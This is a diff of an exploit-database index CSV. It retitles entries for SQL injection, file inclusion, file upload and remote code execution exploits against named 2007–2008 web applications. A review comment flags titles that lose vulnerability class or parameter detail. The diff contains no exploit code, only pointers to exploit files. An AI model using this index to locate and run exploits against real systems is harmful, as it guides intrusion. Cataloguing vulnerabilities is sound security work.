@@ -17730,7 +17733,7 @@ id,file,description,date,author,platform,type,port
 4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion",2007-06-21,Kw3[R]Ln,php,webapps,0
 4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0
 4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0
-4092,platforms/php/webapps/4092.txt,"NetClassifieds - (SQL Injection / Cross-Site Scripting / Full Path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié",php,webapps,0
+4092,platforms/php/webapps/4092.txt,"NetClassifieds - SQL Injection / Cross-Site Scripting / Full Path",2007-06-22,"laurent gaffié",php,webapps,0
 4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - (index.php ID) SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0
 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution",2007-06-24,DarkFig,php,webapps,0
 4097,platforms/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0
@@ -17738,7 +17741,7 @@ id,file,description,date,author,platform,type,port
 4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0
 4100,platforms/php/webapps/4100.txt,"phpTrafficA 1.4.2 - (pageid) SQL Injection",2007-06-24,"laurent gaffié",php,webapps,0
 4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 - (footer.inc.php tfooter) Remote File Inclusion",2007-06-25,Rf7awy,php,webapps,0
-4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-06-25,t0pP8uZz,php,webapps,0
+4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting",2007-06-25,t0pP8uZz,php,webapps,0
 4104,platforms/php/webapps/4104.txt,"6ALBlog - 'newsid' SQL Injection",2007-06-25,Crackers_Child,php,webapps,0
 4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 - (ShowImage.php name) File Disclosure",2007-06-25,"H4 / XPK",php,webapps,0
 4106,platforms/php/webapps/4106.php,"DreamLog 0.5 - (upload.php) Arbitrary File Upload",2007-06-25,Dj7xpl,php,webapps,0
@@ -17773,7 +17776,7 @@ id,file,description,date,author,platform,type,port
 4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - viewforum.php SQL Injection",2007-07-03,Coloss,php,webapps,0
 4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,php,webapps,0
 4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - (callboth.php) Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps,0
-4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - (categories_type.php cat) SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0
+4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - 'categories_type.php' SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0
 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0
 4156,platforms/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0
 4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - (profile id) SQL Injection",2007-07-07,Xenduer77,php,webapps,0
@@ -18061,7 +18064,7 @@ id,file,description,date,author,platform,type,port
 4634,platforms/php/webapps/4634.php,"IceBB 1.0-rc6 - Remote Database Authentication Details Exploit",2007-11-18,Gu1ll4um3r0m41n,php,webapps,0
 4635,platforms/php/webapps/4635.php,"Sciurus Hosting Panel - Remote Code Injection",2007-11-18,Liz0ziM,php,webapps,0
 4636,platforms/php/webapps/4636.txt,"Joomla! Component juser 1.0.14 - Remote File Inclusion",2007-11-19,NoGe,php,webapps,0
-4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0
+4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 - Local File Inclusion / SQL Injection",2007-11-20,BugReport.IR,php,webapps,0
 4638,platforms/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0
 4639,platforms/php/webapps/4639.htm,"Ucms 1.8 - Backdoor Remote Command Execution",2007-11-21,D4m14n,php,webapps,0
 4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusion",2007-11-21,NoGe,php,webapps,0
@@ -18099,7 +18102,7 @@ id,file,description,date,author,platform,type,port
 4678,platforms/php/webapps/4678.php,"Seditio CMS 121 - SQL Injection",2007-11-29,InATeam,php,webapps,0
 4679,platforms/php/webapps/4679.txt,"KML share 1.1 - (region.php layer) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0
 4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0
-4681,platforms/php/webapps/4681.txt,"ftp Admin 0.1.0 - (Local File Inclusion / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2007-11-29,Omni,php,webapps,0
+4681,platforms/php/webapps/4681.txt,"ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass",2007-11-29,Omni,php,webapps,0
 4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion",2007-12-01,ShAy6oOoN,php,webapps,0
 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0
 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0
@@ -18118,7 +18121,7 @@ id,file,description,date,author,platform,type,port
 4709,platforms/php/webapps/4709.txt,"SH-News 3.0 - 'comments.php' SQL Injection",2007-12-09,hadihadi,php,webapps,0
 4710,platforms/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection",2007-12-10,"Aria-Security Team",php,webapps,0
 4711,platforms/php/webapps/4711.txt,"Falt4 CMS rc4 10.9.2007 - Multiple Vulnerabilities",2007-12-10,"H-Security Labs",php,webapps,0
-4712,platforms/php/webapps/4712.txt,"falcon CMS 1.4.3 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2007-12-10,MhZ91,php,webapps,0
+4712,platforms/php/webapps/4712.txt,"falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting",2007-12-10,MhZ91,php,webapps,0
 4714,platforms/php/webapps/4714.pl,"MonAlbum 0.87 - Arbitrary File Upload / Password Grabber Exploit",2007-12-10,v0l4arrra,php,webapps,0
 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Encryption Plugin - deletekey() Command Injection",2007-12-11,Backdoored,php,webapps,0
 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php template' Local File Inclusion",2007-12-11,MhZ91,php,webapps,0
@@ -18136,7 +18139,7 @@ id,file,description,date,author,platform,type,port
 4735,platforms/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-12-14,"Michael Brooks",php,webapps,0
 4736,platforms/php/webapps/4736.txt,"Form Tools 1.5.0b - Multiple Remote File Inclusion",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0
 4737,platforms/php/webapps/4737.txt,"PHP Real Estate - 'fullnews.php id' SQL Injection",2007-12-14,t0pP8uZz,php,webapps,0
-4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2007-12-18,MhZ91,php,webapps,0
+4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,php,webapps,0
 4739,platforms/php/webapps/4739.pl,"MOG-WebShop - 'index.php group' SQL Injection",2007-12-18,k1tk4t,php,webapps,0
 4740,platforms/php/webapps/4740.pl,"FreeWebShop 2.2.1 - Blind SQL Injection",2007-12-18,k1tk4t,php,webapps,0
 4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x - Arbitrary File Upload",2007-12-18,Don,php,webapps,0
@@ -18219,11 +18222,11 @@ id,file,description,date,author,platform,type,port
 4845,platforms/php/webapps/4845.pl,"RunCMS Newbb_plus 0.92 - Client IP SQL Injection",2008-01-06,"Eugene Minaev",php,webapps,0
 4846,platforms/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0
 4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps,0
-4848,platforms/asp/webapps/4848.txt,"PortalApp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0
+4848,platforms/asp/webapps/4848.txt,"PortalApp 4.0 - SQL Injection / Cross-Site Scripting / Authentication Bypass",2008-01-06,r3dm0v3,asp,webapps,0
 4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - 'parsedpage' Parameter Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0
 4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - 'go.php' Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0
 4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - 'html.php' Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0
-4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-01-06,"Virangar Security",php,webapps,0
+4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 - Cross-Site Scripting / SQL Injection",2008-01-06,"Virangar Security",php,webapps,0
 4853,platforms/php/webapps/4853.php,"DCP-Portal 6.11 - SQL Injection",2008-01-06,x0kster,php,webapps,0
 4854,platforms/php/webapps/4854.txt,"SineCMS 2.3.5 - Local File Inclusion / Remote Code Execution",2008-01-06,KiNgOfThEwOrLd,php,webapps,0
 4855,platforms/php/webapps/4855.txt,"Shop-Script 2.0 - 'index.php' Remote File Disclosure",2008-01-06,Fisher762,php,webapps,0
@@ -19350,54 +19353,54 @@ id,file,description,date,author,platform,type,port
 6338,platforms/php/webapps/6338.txt,"myPHPNuke < 1.8.8_8rc2 - Cross-Site Scripting / SQL Injection",2008-08-31,MustLive,php,webapps,0
 6339,platforms/php/webapps/6339.txt,"webid 0.5.4 - Multiple Vulnerabilities",2008-08-31,InjEctOr5,php,webapps,0
 6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 - 'item.php' SQL Injection",2008-09-01,Stack,php,webapps,0
-6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) SQL Injection",2008-09-01,e.wiZz!,php,webapps,0
-6343,platforms/php/webapps/6343.txt,"CMSbright - (id_rub_page) SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0
+6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - 'go' Parameter SQL Injection",2008-09-01,e.wiZz!,php,webapps,0
+6343,platforms/php/webapps/6343.txt,"CMSbright - 'id_rub_page' Parameter SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0
 6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload",2008-09-01,Stack,php,webapps,0
 6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection",2008-09-01,"Virangar Security",php,webapps,0
-6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - 'artid' SQL Injection",2008-09-02,MustLive,php,webapps,0
-6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - 'id' SQL Injection",2008-09-02,"Hussin X",php,webapps,0
-6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - (site) SQL Injection",2008-09-02,"Hussin X",php,webapps,0
+6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - 'artid' Parameter SQL Injection",2008-09-02,MustLive,php,webapps,0
+6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - 'id' Parameter SQL Injection",2008-09-02,"Hussin X",php,webapps,0
+6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - 'site' Parameter SQL Injection",2008-09-02,"Hussin X",php,webapps,0
 6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME - 'comment.php' SQL Injection",2008-09-02,"security fears team",php,webapps,0
 6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME - 'readarticle.php' SQL Injection",2008-09-02,InjEctOr5,php,webapps,0
-6352,platforms/php/webapps/6352.txt,"CS-Cart 1.3.5 - (Authentication Bypass) SQL Injection",2008-09-02,"GulfTech Security",php,webapps,0
-6354,platforms/php/webapps/6354.txt,"Spice Classifieds - (cat_path) SQL Injection",2008-09-03,InjEctOr5,php,webapps,0
+6352,platforms/php/webapps/6352.txt,"CS-Cart 1.3.5 - Authentication Bypass",2008-09-02,"GulfTech Security",php,webapps,0
+6354,platforms/php/webapps/6354.txt,"Spice Classifieds - 'cat_path' Parameter SQL Injection",2008-09-03,InjEctOr5,php,webapps,0
 6356,platforms/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution",2008-09-03,zurlich.lpt,php,webapps,0
-6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - (Arbitrary File Upload / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0
+6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting",2008-09-03,Alemin_Krali,php,webapps,0
 6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps,0
-6361,platforms/php/webapps/6361.txt,"Living Local Website - 'listtest.php r' SQL Injection",2008-09-03,"Hussin X",php,webapps,0
-6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - 'adid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0
-6363,platforms/php/webapps/6363.txt,"qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0
-6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0
-6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0
+6361,platforms/php/webapps/6361.txt,"Living Local Website - 'listtest.php' SQL Injection",2008-09-03,"Hussin X",php,webapps,0
+6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - 'adid' Parameter SQL Injection",2008-09-04,"Hussin X",php,webapps,0
+6363,platforms/php/webapps/6363.txt,"qwicsite pro - SQL Injection / Cross-Site Scripting",2008-09-04,Cr@zy_King,php,webapps,0
+6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' Parameter SQL Injection",2008-09-04,"Hussin X",php,webapps,0
+6368,platforms/php/webapps/6368.php,"AWStats Totals 1.14 - 'AWStatstotals.php' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0
 6369,platforms/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0
 6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'id' Parameter Blind SQL Injection",2008-09-05,JosS,php,webapps,0
-6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
-6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - (news_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
-6374,platforms/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
-6375,platforms/php/webapps/6375.txt,"Vastal I-Tech Share Zone - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
-6376,platforms/php/webapps/6376.txt,"Vastal I-Tech DVD Zone - 'cat_id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
-6378,platforms/php/webapps/6378.txt,"Vastal I-Tech Jobs Zone - (news_id) SQL Injection",2008-09-05,Stack,php,webapps,0
-6379,platforms/php/webapps/6379.txt,"Vastal I-Tech MMORPG Zone - (game_id) SQL Injection",2008-09-05,Stack,php,webapps,0
-6380,platforms/php/webapps/6380.txt,"Vastal I-Tech Mag Zone - 'cat_id' SQL Injection",2008-09-05,Stack,php,webapps,0
-6381,platforms/php/webapps/6381.txt,"Vastal I-Tech Freelance Zone - (coder_id) SQL Injection",2008-09-05,Stack,php,webapps,0
-6382,platforms/php/webapps/6382.txt,"Vastal I-Tech Cosmetics Zone - 'cat_id' SQL Injection",2008-09-05,Stack,php,webapps,0
-6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 - (idcat) SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0
-6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - (tage) SQL Injection",2008-09-05,e.wiZz!,php,webapps,0
-6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - (fage) SQL Injection",2008-09-06,ZoRLu,php,webapps,0
+6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - 'ann_id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
+6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - 'news_id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
+6374,platforms/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - 'id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
+6375,platforms/php/webapps/6375.txt,"Vastal I-Tech Share Zone - 'id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
+6376,platforms/php/webapps/6376.txt,"Vastal I-Tech DVD Zone - 'cat_id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
+6378,platforms/php/webapps/6378.txt,"Vastal I-Tech Jobs Zone - 'news_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0
+6379,platforms/php/webapps/6379.txt,"Vastal I-Tech MMORPG Zone - 'game_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0
+6380,platforms/php/webapps/6380.txt,"Vastal I-Tech Mag Zone - 'cat_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0
+6381,platforms/php/webapps/6381.txt,"Vastal I-Tech Freelance Zone - 'coder_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0
+6382,platforms/php/webapps/6382.txt,"Vastal I-Tech Cosmetics Zone - 'cat_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0
+6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 - 'idcat' Parameter SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0
+6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - 'tage' Parameter SQL Injection",2008-09-05,e.wiZz!,php,webapps,0
+6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - 'fage' Parameter SQL Injection",2008-09-06,ZoRLu,php,webapps,0
 6390,platforms/php/webapps/6390.txt,"Integramod 1.4.x - (Insecure Directory) Download Database",2008-09-06,TheJT,php,webapps,0
 6392,platforms/php/webapps/6392.php,"Simple Machines Forum (SMF) 1.1.5 (Windows x86) - Admin Reset Password Exploit",2008-09-06,Raz0r,php,webapps,0
 6393,platforms/php/webapps/6393.pl,"MemHT Portal 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0
-6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - (ordercode) SQL Injection",2008-09-07,BugReport.IR,php,webapps,0
-6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum - (cat) SQL Injection",2008-09-07,r45c4l,php,webapps,0
+6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - 'ordercode' Parameter SQL Injection",2008-09-07,BugReport.IR,php,webapps,0
+6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum - 'cat' Parameter SQL Injection",2008-09-07,r45c4l,php,webapps,0
 6397,platforms/php/webapps/6397.txt,"WordPress 2.6.1 - SQL Column Truncation",2008-09-07,irk4z,php,webapps,0
 6398,platforms/php/webapps/6398.txt,"E-Shop Shopping Cart Script - 'search_results.php' SQL Injection",2008-09-07,Mormoroth,php,webapps,0
-6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum - 'catid' SQL Injection",2008-09-09,r45c4l,php,webapps,0
+6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum - 'catid' Parameter SQL Injection",2008-09-09,r45c4l,php,webapps,0
 6402,platforms/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injections",2008-09-09,"Khashayar Fereidani",php,webapps,0
 6403,platforms/php/webapps/6403.txt,"Hot Links SQL-PHP 3 - 'report.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
 6404,platforms/php/webapps/6404.txt,"Live TV Script - 'index.php mid' SQL Injection",2008-09-09,InjEctOr5,php,webapps,0
-6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 - (sideid) SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0
+6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 - 'sideid' Parameter SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0
 6406,platforms/php/webapps/6406.txt,"Stash 1.0.3 - Insecure Cookie Handling",2008-09-09,Ciph3r,php,webapps,0
-6408,platforms/php/webapps/6408.txt,"CMS Buzz - 'id' SQL Injection",2008-09-09,"security fears team",php,webapps,0
+6408,platforms/php/webapps/6408.txt,"CMS Buzz - 'id' Parameter SQL Injection",2008-09-09,"security fears team",php,webapps,0
 6409,platforms/php/webapps/6409.txt,"AvailScript Article Script - 'articles.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
 6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - 'FCKeditor' Arbitrary File Upload",2008-09-09,Ciph3r,php,webapps,0
 6411,platforms/php/webapps/6411.txt,"AvailScript Photo Album - 'pics.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
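Review bot: Three of the new titles in this hunk drop detail that the old ones carried, unlike the neighbouring rows that only gain `'x' Parameter`. Row 6352 goes from `(Authentication Bypass) SQL Injection` to `Authentication Bypass`, so anyone filtering the index for SQL injection entries no longer finds it; rows 6361 and 6368 lose the parameter names `r` and `sort`. I would keep the class and the parameter, for example `"CS-Cart 1.3.5 - Authentication Bypass / SQL Injection"` and `'r' Parameter SQL Injection`, after checking each against its advisory file. The same applies to 6436 (`(cat)` removed) and 6522 (`'view.php v'` becomes `'view.php'`) in the later hunks at -19408 and -19485.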
@@ -19408,18 +19411,18 @@ id,file,description,date,author,platform,type,port
 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0
 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
 6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
-6422,platforms/php/webapps/6422.txt,"phpVID 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0
-6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0
-6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-09-11,"Khashayar Fereidani",php,webapps,0
-6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline - (pageid) SQL Injection",2008-09-11,r45c4l,php,webapps,0
-6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - (p) Local File Inclusion",2008-09-11,StAkeR,php,webapps,0
+6422,platforms/php/webapps/6422.txt,"PHPVID 1.1 - Cross-Site Scripting / SQL Injection",2008-09-10,r45c4l,php,webapps,0
+6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' Parameter SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0
+6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",php,webapps,0
+6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline - 'pageid' Parameter SQL Injection",2008-09-11,r45c4l,php,webapps,0
+6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - 'p' Parameter Local File Inclusion",2008-09-11,StAkeR,php,webapps,0
 6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - Cross-Site Scripting / File Disclosure/Bypass / SQL Injection",2008-09-11,"Khashayar Fereidani",php,webapps,0
 6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 - (topic) Local File Inclusion",2008-09-11,SirGod,php,webapps,0
 6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 - Bypass SQL Injection Filtering Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0
 6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution",2008-09-11,"Khashayar Fereidani",php,webapps,0
-6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' SQL Injection",2008-09-11,ZoRLu,php,webapps,0
-6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection",2008-09-11,"Virangar Security",php,webapps,0
-6436,platforms/php/webapps/6436.txt,"PhpWebGallery 1.3.4 - (cat) Blind SQL Injection",2008-09-11,Stack,php,webapps,0
+6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' Parameter SQL Injection",2008-09-11,ZoRLu,php,webapps,0
+6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' Parameter SQL Injection",2008-09-11,"Virangar Security",php,webapps,0
+6436,platforms/php/webapps/6436.txt,"PhpWebGallery 1.3.4 - Blind SQL Injection",2008-09-11,Stack,php,webapps,0
 6437,platforms/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user",2008-09-11,Stack,php,webapps,0
 6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - 'cookie' Authentication Bypass",2008-09-11,Tec-n0x,php,webapps,0
 6439,platforms/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Arbitrary File Upload",2008-09-12,Stack,php,webapps,0
@@ -19434,7 +19437,7 @@ id,file,description,date,author,platform,type,port
 6449,platforms/php/webapps/6449.php,"pLink 2.07 - (linkto.php id) Blind SQL Injection",2008-09-13,Stack,php,webapps,0
 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0
 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps,0
-6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0
+6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - Local File Inclusion / SQL Injection",2008-09-13,r3dm0v3,php,webapps,0
 6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - (oyun) SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0
 6455,platforms/php/webapps/6455.txt,"Linkarity - 'link.php' SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0
 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0
@@ -19485,7 +19488,7 @@ id,file,description,date,author,platform,type,port
 6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) Local File Inclusion / Arbitrary File Upload",2008-09-21,EgiX,php,webapps,0
 6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - 'section.php' Local File Inclusion",2008-09-21,Stack,php,webapps,0
 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0
-6522,platforms/php/webapps/6522.txt,"AvailScript Article Script - 'view.php v' SQL Injection",2008-09-21,"Hussin X",php,webapps,0
